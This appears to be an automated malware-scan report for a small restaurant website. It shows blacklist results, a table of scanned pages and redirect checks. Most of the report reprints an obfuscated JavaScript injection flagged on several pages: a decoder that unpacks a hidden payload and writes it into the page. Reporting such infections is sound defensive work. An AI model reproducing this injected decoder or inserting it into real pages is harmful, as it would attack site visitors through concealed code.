Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tokyosushiexpress.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tokyosushiexpress.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tokyosushiexpress.net/ | 200 OK Content-Length: 7917 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/mEmbed.js | 200 OK Content-Length: 2968 Content-Type: application/javascript | clean |
http://tokyosushiexpress.net/Embed.js | 200 OK Content-Length: 80 Content-Type: application/javascript | clean |
http://tokyosushiexpress.net/index.html | 200 OK Content-Length: 7917 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/about-us.html | 200 OK Content-Length: 3909 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/test404page.js | 404 Not Found Content-Length: 307 Content-Type: text/html | clean |
http://tokyosushiexpress.net/menu.html | 200 OK Content-Length: 4127 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/location.html | 200 OK Content-Length: 3946 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/gallery.html | 200 OK Content-Length: 3907 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/contact-us.html | 200 OK Content-Length: 3913 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- l=new Array(-66,-15,-10,-7,-6,46,34,-9,101,108,-14,-13,32,13,111,-45,-24,-21,-20,43, 61,-23,40,41,-36,-33,-30,-29,115,121,-32,76,98,-35,114,118,-38,103,-42,-41, 72,74,-44,33,47,-61,-54,-51,-50,62,67,-53,59,60,-58,-57,82,84,-60,73, 80,-63,119,-65,10,9,-84,-71,-70,110,105,-79,-76,-75,104,112,-78,83,102,-81, 99,-83,123,125,-88,-87,97,100,-90,116,-92,109,117); d="C`6@MCX`2SC,bg@.L/G[AO?O>_g/J?eYg@e=JJ^^Cd38cU_`N<2eB_b*M9,2Y2N,.LG[AQ[4g0" +"N0D_X8N0QEjK;Z606*<2.G6DEJ;QK.:2.LGb1<-=WjZRc0-0*3.,8P77Z2^ZL2.,:/*S@Rd1=W" +"jZRc,PHT2/,]R[MA+<W;^4g4E2U`dAU]Y8P77Z-JCdT2^^CcU^7ITBW0^GTZ*"; c=243;b=a=0;o=""; function GetBit(){if(a==0){b=d.charCodeAt(0)-42; if(b>50)b--;d=d.slice(1,d.length);a=6;}a--; return ((b >> a) & 0x01);} window.status='Decompressing'; while(c--){i=0;while(l[i]<0){if(GetBit())i=-l[i];else i++;} o+=String.fromCharCode(l[i]);}document.write(o); window.status='Document Loaded'; Antivirus reports:
| ||
http://tokyosushiexpress.net/coupons.html | 200 OK Content-Length: 362 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tokyosushiexpress.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 03:36:47 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6
Content-Length: 7917
Content-Type: text/html
X-Powered-By: PHP/5.2.6
...7917 bytes of data.
GET / HTTP/1.1
Host: tokyosushiexpress.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 03:36:47 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6
Content-Length: 7917
Content-Type: text/html
X-Powered-By: PHP/5.2.6
...7917 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tokyosushiexpress.net
Referer: http://www.google.com/search?q=tokyosushiexpress.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tokyosushiexpress.net
Referer: http://www.google.com/search?q=tokyosushiexpress.net
Result:
The result is similar to the first query. There are no suspicious redirects found.